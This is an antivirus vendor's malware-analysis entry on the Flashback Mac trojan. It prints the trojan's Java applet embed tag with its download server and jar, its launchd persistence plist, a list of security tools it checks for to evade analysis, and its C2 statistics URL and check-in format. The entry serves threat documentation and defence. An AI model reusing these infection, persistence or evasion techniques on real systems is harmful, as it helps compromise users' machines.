Virus library
Knowledge database
Last updated: 2013-05-19 01:51:00 MSK
Total records in virus database: 4027839

Top virus chart

SCRIPT.Virus1.34%
Adware.Downware.9151.20%
Adware.InstallCore.1150.82%
Adware.Downware.11570.73%
Adware.Downware.1790.65%
Search in virus database

BackDoor.Flashback.39

Added to Dr.Web virus database:2012-03-27
Virus description was added:2012-04-05

The Trojan horse for Mac OS X. Exploits a Java vulnerability to infect a system. Installation parameters are transferred with the applet parameters. Example:

<object type="application/x-java-applet" width="0" height="0">
<param name="s" value="1"/>
<param name="q" value="2"/>
<param name="svname" value="com.zeobit.keep">
<param name="svbname" value="mkeeper">
<param name="dname" value="Software Update">
<param name="lurl" value="31.31.79.87">');
<param name="archive" value="al-2.jar">
<param name="code" value="a.apl">
</object>

An exploit saves the executable and plist-file responsible for its launch to the hard drive.

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.zeobit.keep</string>
<key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>4212</integer>
<key>StandardErrorPath</key><string>/dev/null</string>
<key>StandardOutPath</key><string>/dev/null</string>
</dict>
</plist>

Once launched, the Trojan searches for the following components in the system and if at least one of them is found, the Trojan process ends:

* /Library/Little Snitch
* /Developer/Applications/Xcode.app/Contents/MacOS/Xcode
* /Applications/VirusBarrier X6.app
* /Applications/iAntiVirus/iAntiVirus.app
* /Applications/avast!.app
* /Applications/ClamXav.app
* /Applications/HTTPScoop.app
* /Applications/Packet Peeper.app

After that it sends an installation success notification to a statistics server:

http://46.17.63.144/stat_svc/

It generates a list of command servers and sends consecutive queries at control server addresses. The GET requests include the following string in the user-agent field:

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1; sv:%s; id:%s) Gecko/20100101 Firefox/9.0.1

Here sv is the bot version, id is a unique identifier for the machine (Hardware UUID).

After receiving a response from the control server, BackDoor.Flashback.39 searches the response for three tags:

##begin##
##sign##
##end##

If the RSA verification for the reply is successful, then the Trojan horse downloads and runs the payload on the infected machine.

Company | News&Events | Send a virus | Online scanner | Privacy policy | Site map
[Google+] [Blog Dr.Web] [You Tube] [Twitter] [Facebook]
Doctor Web is the Russian developer of Dr.Web anti-virus software. We have been developing our products since 1992. The company is a key player on the Russian market for software that meets the fundamental need of any business — information security. Doctor Web is one of the few anti-virus vendors in the world to have its own technologies to detect and cure malware. Our anti-virus protection system allows the information systems of our customers to be protected from any threats, even those still unknown. Doctor Web was the first company to offer an anti-virus as a service and, to this day, is still the undisputed Russian market leader in Internet security services for service providers. Doctor Web has received state certificates and awards; our satisfied customers spanning the globe are clear evidence of the high quality of the products created by our talented Russian programmers.


Rambler 100